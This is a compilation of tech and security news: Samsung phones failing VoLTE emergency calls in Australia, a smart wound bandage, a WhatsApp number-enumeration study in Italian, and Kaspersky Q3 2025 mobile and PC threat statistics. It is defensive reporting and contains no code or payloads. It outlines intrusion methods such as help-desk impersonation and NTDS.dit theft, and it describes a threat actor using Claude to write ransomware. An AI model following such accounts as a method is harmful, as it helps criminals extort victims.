Specifically, in the Australian case, this appears to affect a range of older Samsung phones. Testing by telecommunications company Telstra found that some of these phones were unable to make Triple Zero emergency calls when only the Vodafone network was available. These phones will happily work when a Telstra or Optus network is available, but fallback to the Vodafone network has been found to fail. Research from other sources has also identified that certain phones can reach Triple Zero when using Telstra or Optus SIM cards, but may fail when equipped with a Vodafone SIM.

For its part, Samsung has provided a list of models affected by the issue. Some older phones, mostly from 2016 and 2017, will need to be replaced, as they will not be updated to reliably make emergency calls over 4G networks. Meanwhile, newer phones, like the Galaxy S20+ and Galaxy S21 Ultra 5G, will be given software updates to enable reliable emergency calling. Telecom operators have been contacting users of affected phones, indicating they will need to replace or upgrade as necessary. Devices that are deemed to be unable to safely make emergency calls will be banned from Australian mobile networks 28 days after initial notification to customers.

Broader Problem

Telecommunications providers have been reaching out to customers with instructions to update or replace their devices to ensure they can safely call Triple Zero, whichever local network is available. Credit: Amaysim, via screenshot
This issue is not limited to just Australia. Indeed, European authorities have been aware of issues with VoLTE emergency calling since at least 2022. Many phones sold in European markets are only capable of making emergency calls on 2G and 3G networks, and could fail to reach emergency services if only 4G connections are available. This issue was particularly noted to be a risk when roaming internationally, where a handset sold in one country may prove inoperable with VoLTE calling on a foreign network.

Some blame has been laid on the loose standardization of the VoLTE standard. Unlike 2G and 3G standards, global interoperability is pretty much non-existent when it comes to phone calls. This wasn’t seen as a big issue early on, as when 4G devices first hit the market, 2G and 3G phone networks were readily available to carry any voice calls that couldn’t be handled by VoLTE. However, with 2G and 3G networks shutting down, the lack of VoLTE standardization and interoperability between carriers has been laid bare.

While Australia is currently tangling with this issue, expect it to crop up in other parts of the world before long. Europe is currently working towards 2G and 3G shutdowns, as our other jurisdictions, and issues around roaming functionality still loom large for those taking handsets overseas. Ultimately, end users will be asking a very simple question. If 2G and 3G technologies could handle emergency calls on virtually any compatible network around the world, how did it go so wrong when 4G and 5G rolled around? Old networks existed as a crutch that avoided the issue for a time, but they were never going to last forever. It surely didn’t have to be this way.

hackaday.com/2025/11/19/why-sa…

If you get a small cut, you might throw a plastic bandage on it to help it heal faster. However, there are fancier options on the horizon, like this advanced AI-powered smart bandage.

Researchers at UC Santa Cruz have developed a proof-of-concept device called a-Heal, intended for use inside existing commercial bandages for colostomy use. The device is fitted with a small camera, which images the wound site every two hours. The images are then uploaded via a wireless connection, and processed with a machine learning model that has been trained to make suggestions on how to better stimulate the healing process based on the image input. The device can then follow these recommendations, either using electrical stimulation to reduce inflammation in the wound, or supplying fluoxetine to stimulate the growth of healthy tissue. In testing, the device was able to improve the rate of skin coverage over an existing wound compared to a control.

The long-term goal is to apply the technology in a broader sense to help better treat things like chronic or infected wounds that may have difficulty healing. It’s still at an early stage for now, but it could one day be routine for medical treatment to involve the use of small smart devices to gain a better rolling insight on the treatment of wounds. It’s not the first time we’ve explored innovative methods of wound care; we’ve previously looked at how treatments from the past could better inform how we treat in future.

hackaday.com/2025/11/19/smart-…

La portata della fuga di notizie, descritta da un team dell’Università di Vienna, dimostra quanto possa essere pericolosa la familiare funzione di ricerca contatti delle app di messaggistica più diffuse.

WhatsApp ha sempre enfatizzato la facilità di aggiunta di nuove persone: basta inserire un numero di telefono nella propria rubrica e il servizio rivela immediatamente se la persona è registrata sull’app, rivelandone nome, foto e profilo parziale. Tuttavia, questa semplicità è diventata la base per una delle più grandi raccolte di dati utente della storia, e tutto ciò è avvenuto senza hackeraggi o aggirando barriere tecniche.

Ricercatori austriaci hanno deciso di testare se la ricerca automatizzata di numeri di telefono potesse rivelare esattamente chi stava usando WhatsApp. Hanno avviato il processo e, nel giro di poche ore, è diventato chiaro che non c’erano praticamente limiti. Il servizio consentiva un numero illimitato di richieste tramite la versione web e, di conseguenza, il team è stato in grado di creare un database di 3,5 miliardi di numeri, raccogliendo essenzialmente informazioni su ogni utente WhatsApp del pianeta. Per quasi il 57% dei record, sono stati in grado di ottenere foto del profilo e per quasi un terzo, stati testuali, che molte persone usano come breve presentazione di sé.

Secondo gli stessi ricercatori, questa sarebbe stata la più grande fuga di dati di numeri di telefono ed elementi di profili pubblici mai registrata se i dati non fossero stati raccolti esclusivamente per scopi accademici. Hanno segnalato la scoperta in primavera e cancellato l’intero set di dati, ma il sistema è rimasto completamente vulnerabile fino a ottobre, il che significa che un’operazione simile avrebbe potuto essere eseguita da chiunque, dagli spammer alle agenzie governative che monitorano le attività indesiderate sui propri cittadini.

Nonostante le rassicurazioni di Meta sull’implementazione di misure di sicurezza sempre più efficaci contro la raccolta massiva di dati, il team di Vienna afferma di non aver effettivamente riscontrato alcuna limitazione. Hanno sottolineato che WhatsApp aveva segnalato un problema simile già nel 2017: il ricercatore olandese Laurent Kloese aveva descritto un sistema per la verifica massiva dei numeri e aveva dimostrato che poteva raccogliere non solo le informazioni del profilo, ma anche il tempo trascorso online. Anche allora, l’azienda aveva affermato che tutto funzionava nel rispetto delle impostazioni di privacy standard .

Confrontando i risultati attuali con quelli di otto anni fa, si nota quanto sia aumentato il rischio. Mentre in precedenza c’erano decine di milioni di record potenzialmente accessibili, ora più di un terzo della popolazione mondiale utilizza il servizio e il numero stesso ha da tempo cessato di essere casuale. I ricercatori sottolineano che un numero di telefono non può fungere da identificatore segreto: gli intervalli di numeri sono limitati, il che significa che gli attacchi brute-force sono sempre possibili, a meno che non vi siano limiti rigorosi al numero di richieste.

Il team ha anche studiato le caratteristiche dei profili per Paese. Negli Stati Uniti, dei 137 milioni di numeri raccolti, il 44% degli utenti aveva foto pubbliche, mentre circa un terzo aveva stati testuali. In India, dove WhatsApp è significativamente più utilizzato, il 62% dei profili su 750 milioni era pubblico. In Brasile, la cifra era quasi la stessa: il 61% su 206 milioni. Più il servizio è popolare, meno persone modificano le proprie impostazioni sulla privacy e più ampia è la cerchia di coloro che rendono pubbliche le proprie immagini e descrizioni.

Di particolare preoccupazione è stata la scoperta di milioni di numeri di telefono in Paesi in cui WhatsApp è ufficialmente bloccato. I ricercatori hanno trovato 2,3 milioni di tali record in Cina e 1,6 milioni in Myanmar. Queste informazioni consentono alle autorità locali di rintracciare le persone che aggirano i divieti e, in alcuni casi, di utilizzarle come base per un’azione penale. Ci sono segnalazioni di persone detenute in Cina semplicemente per aver utilizzato l’app.

Durante l’analisi delle chiavi utilizzate nel protocollo di crittografia end-to-end per recuperare i messaggi, il team ha notato un’altra anomalia: un numero significativo di valori duplicati. Alcune chiavi sono state utilizzate centinaia di volte e circa due dozzine di numeri di telefono americani erano associati a una chiave nulla. I ricercatori sospettano che si tratti di client WhatsApp di terze parti non ufficiali, utilizzati attivamente da gruppi di truffatori. Ciò è indicato anche dal comportamento di alcuni account con chiavi duplicate: sembravano chiaramente strumenti per frodi o messaggi di massa.

L'articolo WhatsApp, maxi–fuga di dati: 3,5 miliardi di numeri “rubati” dai ricercatori dell’Università di Vienna proviene da Red Hot Cyber.

IT threat evolution in Q3 2025. Mobile statistics
IT threat evolution in Q3 2025. Non-mobile statistics

The quarter at a glance

In the third quarter of 2025, we updated the methodology for calculating statistical indicators based on the Kaspersky Security Network. These changes affected all sections of the report except for the statistics on installation packages, which remained unchanged.

To illustrate the differences between the reporting periods, we have also recalculated data for the previous quarters. Consequently, these figures may significantly differ from the previously published ones. However, subsequent reports will employ this new methodology, enabling precise comparisons with the data presented in this post.

The Kaspersky Security Network (KSN) is a global network for analyzing anonymized threat information, voluntarily shared by users of Kaspersky solutions. The statistics in this report are based on KSN data unless explicitly stated otherwise.

The quarter in numbers

According to Kaspersky Security Network, in Q3 2025:

• 47 million attacks utilizing malware, adware, or unwanted mobile software were prevented.

• Trojans were the most widespread threat among mobile malware, encountered by 15.78% of all attacked users of Kaspersky solutions.
• More than 197,000 malicious installation packages were discovered, including:
  
  • 52,723 associated with mobile banking Trojans.
  • 1564 packages identified as mobile ransomware Trojans.

  
  

Quarterly highlights

The number of malware, adware, or unwanted software attacks on mobile devices, calculated according to the updated rules, totaled 3.47 million in the third quarter. This is slightly less than the 3.51 million attacks recorded in the previous reporting period.

Attacks on users of Kaspersky mobile solutions, Q2 2024 — Q3 2025 (download)

At the start of the quarter, a user complained to us about ads appearing in every browser on their smartphone. We conducted an investigation, discovering a new version of the BADBOX backdoor, preloaded on the device. This backdoor is a multi-level loader embedded in a malicious native library, librescache.so, which was loaded by the system framework. As a result, a copy of the Trojan infiltrated every process running on the device.

Another interesting finding was Trojan-Downloader.AndroidOS.Agent.no, which was embedded in mods for messaging and other apps. It downloaded Trojan-Clicker.AndroidOS.Agent.bl onto the device. The clicker received a URL from its server where an ad was being displayed, opened it in an invisible WebView window, and used machine learning algorithms to find and click the close button. In this way, fraudsters exploited the user’s device to artificially inflate ad views.

Mobile threat statistics

In the third quarter, Kaspersky security solutions detected 197,738 samples of malicious and unwanted software for Android, which is 55,000 more than in the previous reporting period.

Detected malicious and potentially unwanted installation packages, Q3 2024 — Q3 2025 (download)

The detected installation packages were distributed by type as follows:

Detected mobile apps by type, Q2* — Q3 2025 (download)

* Changes in the statistical calculation methodology do not affect this metric. However, data for the previous quarter may differ slightly from previously published figures due to a retrospective review of certain verdicts.

The share of banking Trojans decreased somewhat, but this was due less to a reduction in their numbers and more to an increase in other malicious and unwanted packages. Nevertheless, banking Trojans, still dominated by Mamont packages, continue to hold the top spot. The rise in Trojan droppers is also linked to them: these droppers are primarily designed to deliver banking Trojans.

Share* of users attacked by the given type of malicious or potentially unwanted app out of all targeted users of Kaspersky mobile products, Q2 — Q3 2025 (download)

* The total may exceed 100% if the same users experienced multiple attack types.

Adware leads the pack in terms of the number of users attacked, with a significant margin. The most widespread types of adware are HiddenAd (56.3%) and MobiDash (27.4%). RiskTool-type unwanted apps occupy the second spot. Their growth is primarily due to the proliferation of the Revpn module, which monetizes user internet access by turning their device into a VPN exit point. The most popular Trojans predictably remain Triada (55.8%) and Fakemoney (24.6%). The percentage of users who encountered these did not undergo significant changes.

TOP 20 most frequently detected types of mobile malware

Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.

* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.

The top positions in the list of the most widespread malware are once again occupied by modified messaging apps Triada.ii, Triada.fe, Triada.gn, and others. The pre-installed backdoor Triada.z ranked fifth, immediately following Fakemoney – fake apps that collect users’ personal data under the guise of providing payments or financial services. The dropper that landed in ninth place, Agent.gen, is an obfuscated ELF file linked to the banking Trojan Coper.c, which sits immediately after DangerousObject.Multi.Generic.

Region-specific malware

In this section, we describe malware that primarily targets users in specific countries.

* The country where the malware was most active.
** Unique users who encountered this Trojan modification in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same modification.

Banking Trojans, primarily Coper, continue to operate actively in Turkey. Indian users also attract threat actors distributing this type of software. Specifically, the banker Rewardsteal is active in the country. Teledoor backdoors, embedded in a fake Telegram client, have been deployed in Iran.
Notable is the surge in Rkor ransomware Trojan attacks in Germany. The activity was significantly lower in previous quarters. It appears the fraudsters have found a new channel for delivering malicious apps to users.

Mobile banking Trojans

In the third quarter of 2025, 52,723 installation packages for mobile banking Trojans were detected, 10,000 more than in the second quarter.

Installation packages for mobile banking Trojans detected by Kaspersky, Q3 2024 — Q3 2025 (download)

The share of the Mamont Trojan among all bankers slightly increased again, reaching 61.85%. However, in terms of the share of attacked users, Coper moved into first place, with the same modification being used in most of its attacks. Variants of Mamont ranked second and lower, as different samples were used in different attacks. Nevertheless, the total number of users attacked by the Mamont family is greater than that of users attacked by Coper.

TOP 10 mobile bankers

* Unique users who encountered this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

Mobile ransomware Trojans

Due to the increased activity of mobile ransomware Trojans in Germany, which we mentioned in the Region-specific malware section, we have decided to also present statistics on this type of threat. In the third quarter, the number of ransomware Trojan installation packages more than doubled, reaching 1564.

* Unique users who encountered the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

securelist.com/malware-report-…

IT threat evolution in Q3 2025. Mobile statistics
IT threat evolution in Q3 2025. Non-mobile statistics

Quarterly figures

In Q3 2025:

• Kaspersky solutions blocked more than 389 million attacks that originated with various online resources.
• Web Anti-Virus responded to 52 million unique links.
• File Anti-Virus blocked more than 21 million malicious and potentially unwanted objects.
• 2,200 new ransomware variants were detected.
• Nearly 85,000 users experienced ransomware attacks.
• 15% of all ransomware victims whose data was published on threat actors’ data leak sites (DLSs) were victims of Qilin.
• More than 254,000 users were targeted by miners.

Ransomware

Quarterly trends and highlights

Law enforcement success

The UK’s National Crime Agency (NCA) arrested the first suspect in connection with a ransomware attack that caused disruptions at numerous European airports in September 2025. Details of the arrest have not been published as the investigation remains ongoing. According to security researcher Kevin Beaumont, the attack employed the HardBit ransomware, which he described as primitive and lacking its own data leak site.

The U.S. Department of Justice filed charges against the administrator of the LockerGoga, MegaCortex and Nefilim ransomware gangs. His attacks caused millions of dollars in damage, putting him on wanted lists for both the FBI and the European Union.

U.S. authorities seized over $2.8 million in cryptocurrency, $70,000 in cash, and a luxury vehicle from a suspect allegedly involved in distributing the Zeppelin ransomware. The criminal scheme involved data theft, file encryption, and extortion, with numerous organizations worldwide falling victim.

A coordinated international operation conducted by the FBI, Homeland Security Investigations (HSI), the U.S. Internal Revenue Service (IRS), and law enforcement agencies from several other countries successfully dismantled the infrastructure of the BlackSuit ransomware. The operation resulted in the seizure of four servers, nine domains, and $1.09 million in cryptocurrency. The objective of the operation was to destabilize the malware ecosystem and protect critical U.S. infrastructure.

Vulnerabilities and attacks

SSL VPN attacks on SonicWall

Since late July, researchers have recorded a rise in attacks by the Akira threat actor targeting SonicWall firewalls supporting SSL VPN. SonicWall has linked these incidents to the already-patched vulnerability CVE-2024-40766, which allows unauthorized users to gain access to system resources. Attackers exploited the vulnerability to steal credentials, subsequently using them to access devices, even those that had been patched. Furthermore, the attackers were able to bypass multi-factor authentication enabled on the devices. SonicWall urges customers to reset all passwords and update their SonicOS firmware.

Scattered Spider uses social engineering to breach VMware ESXi

The Scattered Spider (UNC3944) group is attacking VMware virtual environments. The attackers contact IT support posing as company employees and request to reset their Active Directory password. Once access to vCenter is obtained, the threat actors enable SSH on the ESXi servers, extract the NTDS.dit database, and, in the final phase of the attack, deploy ransomware to encrypt all virtual machines.

Exploitation of a Microsoft SharePoint vulnerability

In late July, researchers uncovered attacks on SharePoint servers that exploited the ToolShell vulnerability chain. In the course of investigating this campaign, which affected over 140 organizations globally, researchers discovered the 4L4MD4R ransomware based on Mauri870 code. The malware is written in Go and packed using the UPX compressor. It demands a ransom of 0.005 BTC.

The application of AI in ransomware development

A UK-based threat actor used Claude to create and launch a ransomware-as-a-service (RaaS) platform. The AI was responsible for writing the code, which included advanced features such as anti-EDR techniques, encryption using ChaCha20 and RSA algorithms, shadow copy deletion, and network file encryption.

Anthropic noted that the attacker was almost entirely dependent on Claude, as they lacked the necessary technical knowledge to provide technical support to their own clients. The threat actor sold the completed malware kits on the dark web for $400–$1,200.

Researchers also discovered a new ransomware strain, dubbed PromptLock, that utilizes an LLM directly during attacks. The malware is written in Go. It uses hardcoded prompts to dynamically generate Lua scripts for data theft and encryption across Windows, macOS and Linux systems. For encryption, it employs the SPECK-128 algorithm, which is rarely used by ransomware groups.

Subsequently, scientists from the NYU Tandon School of Engineering traced back the likely origins of PromptLock to their own educational project, Ransomware 3.0, which they detailed in a prior publication.

The most prolific groups

This section highlights the most prolific ransomware gangs by number of victims added to each group’s DLS. As in the previous quarter, Qilin leads by this metric. Its share grew by 1.89 percentage points (p.p.) to reach 14.96%. The Clop ransomware showed reduced activity, while the share of Akira (10.02%) slightly increased. The INC Ransom group, active since 2023, rose to third place with 8.15%.

Number of each group’s victims according to its DLS as a percentage of all groups’ victims published on all the DLSs under review during the reporting period (download)

Number of new variants

In the third quarter, Kaspersky solutions detected four new families and 2,259 new ransomware modifications, nearly one-third more than in Q2 2025 and slightly more than in Q3 2024.

Number of new ransomware modifications, Q3 2024 — Q3 2025 (download)

Number of users attacked by ransomware Trojans

During the reporting period, our solutions protected 84,903 unique users from ransomware. Ransomware activity was highest in July, while August proved to be the quietest month.

Number of unique users attacked by ransomware Trojans, Q3 2025 (download)

Attack geography

TOP 10 countries attacked by ransomware Trojans

In the third quarter, Israel had the highest share (1.42%) of attacked users. Most of the ransomware in that country was detected in August via behavioral analysis.

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country/territory.

TOP 10 most common families of ransomware Trojans

* Unique Kaspersky users attacked by the specific ransomware Trojan family as a percentage of all unique users attacked by this type of threat.

Miners

Number of new variants

In Q3 2025, Kaspersky solutions detected 2,863 new modifications of miners.

Number of new miner modifications, Q3 2025 (download)

Number of users attacked by miners

During the third quarter, we detected attacks using miner programs on the computers of 254,414 unique Kaspersky users worldwide.

Number of unique users attacked by miners, Q3 2025 (download)

Attack geography

TOP 10 countries and territories attacked by miners

* Excluded are countries and territories with relatively few (under 50,000) Kaspersky users.
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country/territory.

Attacks on macOS

In April, researchers at Iru (formerly Kandji) reported the discovery of a new spyware family, PasivRobber. We observed the development of this family throughout the third quarter. Its new modifications introduced additional executable modules that were absent in previous versions. Furthermore, the attackers began employing obfuscation techniques in an attempt to hinder sample detection.

In July, we reported on a cryptostealer distributed through fake extensions for the Cursor AI development environment, which is based on Visual Studio Code. At that time, the malicious JavaScript (JS) script downloaded a payload in the form of the ScreenConnect remote access utility. This utility was then used to download cryptocurrency-stealing VBS scripts onto the victim’s device. Later, researcher Michael Bocanegra reported on new fake VS Code extensions that also executed malicious JS code. This time, the code downloaded a malicious macOS payload: a Rust-based loader. This loader then delivered a backdoor to the victim’s device, presumably also aimed at cryptocurrency theft. The backdoor supported the loading of additional modules to collect data about the victim’s machine. The Rust downloader was analyzed in detail by researchers at Iru.

In September, researchers at Jamf reported the discovery of a previously unknown version of the modular backdoor ChillyHell, first described in 2023. Notably, the Trojan’s executable files were signed with a valid developer certificate at the time of discovery.

The new sample had been available on Dropbox since 2021. In addition to its backdoor functionality, it also contains a module responsible for bruteforcing passwords of existing system users.

By the end of the third quarter, researchers at Microsoft reported new versions of the XCSSET spyware, which targets developers and spreads through infected Xcode projects. These new versions incorporated additional modules for data theft and system persistence.

TOP 20 threats to macOS

Unique users* who encountered this malware as a percentage of all attacked users of Kaspersky security solutions for macOS (download)

* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.

The PasivRobber spyware continues to increase its activity, with its modifications occupying the top spots in the list of the most widespread macOS malware varieties. Other highly active threats include Amos Trojans, which steal passwords and cryptocurrency wallet data, and various adware. The Backdoor.OSX.Agent.l family, which took thirteenth place, represents a variation on the well-known open-source malware, Mettle.

Geography of threats to macOS

TOP 10 countries and territories by share of attacked users

IoT threat statistics

This section presents statistics on attacks targeting Kaspersky IoT honeypots. The geographic data on attack sources is based on the IP addresses of attacking devices.

In Q3 2025, there was a slight increase in the share of devices attacking Kaspersky honeypots via the SSH protocol.

Distribution of attacked services by number of unique IP addresses of attacking devices (download)

Conversely, the share of attacks using the SSH protocol slightly decreased.

Distribution of attackers’ sessions in Kaspersky honeypots (download)

TOP 10 threats delivered to IoT devices

Share of each threat delivered to an infected device as a result of a successful attack, out of the total number of threats delivered (download)

In the third quarter, the shares of the NyaDrop and Mirai.b botnets significantly decreased in the overall volume of IoT threats. Conversely, the activity of several other members of the Mirai family, as well as the Gafgyt botnet, increased. As is typical, various Mirai variants occupy the majority of the list of the most widespread malware strains.

Attacks on IoT honeypots

Germany and the United States continue to lead in the distribution of attacks via the SSH protocol. The share of attacks originating from Panama and Iran also saw a slight increase.

The largest number of attacks via the Telnet protocol were carried out from China, as is typically the case. Devices located in India reduced their activity, whereas the share of attacks from Indonesia increased.

Attacks via web resources

The statistics in this section are based on detection verdicts by Web Anti-Virus, which protects users when suspicious objects are downloaded from malicious or infected web pages. These malicious pages are purposefully created by cybercriminals. Websites that host user-generated content, such as message boards, as well as compromised legitimate sites, can become infected.

TOP 10 countries that served as sources of web-based attacks

This section gives the geographical distribution of sources of online attacks (such as web pages redirecting to exploits, sites hosting exploits and other malware, and botnet C2 centers) blocked by Kaspersky products. One or more web-based attacks could originate from each unique host.

To determine the geographic source of web attacks, we matched the domain name with the real IP address where the domain is hosted, then identified the geographic location of that IP address (GeoIP).

In the third quarter of 2025, Kaspersky solutions blocked 389,755,481 attacks from internet resources worldwide. Web Anti-Virus was triggered by 51,886,619 unique URLs.

Web-based attacks by country, Q3 2025 (download)

Countries and territories where users faced the greatest risk of online infection

To assess the risk of malware infection via the internet for users’ computers in different countries and territories, we calculated the share of Kaspersky users in each location on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

This ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users targeted by web-based Malware attacks as a percentage of all unique users of Kaspersky products in the country/territory.
On average, over the course of the quarter, 4.88% of devices globally were subjected to at least one web-based Malware attack.

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable media, or initially made their way onto the computer in non-open form. Examples of the latter are programs in complex installers and encrypted files.

Data in this section is based on analyzing statistics produced by anti-virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media: flash drives, camera memory cards, phones, and external drives. The statistics are based on detection verdicts from the on-access scan (OAS) and on-demand scan (ODS) modules of File Anti-Virus.

In the third quarter of 2025, our File Anti-Virus recorded 21,356,075 malicious and potentially unwanted objects.

Countries and territories where users faced the highest risk of local infection

For each country and territory, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. This statistic reflects the level of personal computer infection in different countries and territories around the world.

Note that this ranked list includes only attacks by malicious objects classified as Malware. Our calculations leave out File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users on whose computers local Malware threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.
On average worldwide, local Malware threats were detected at least once on 12.36% of computers during the third quarter.

securelist.com/malware-report-…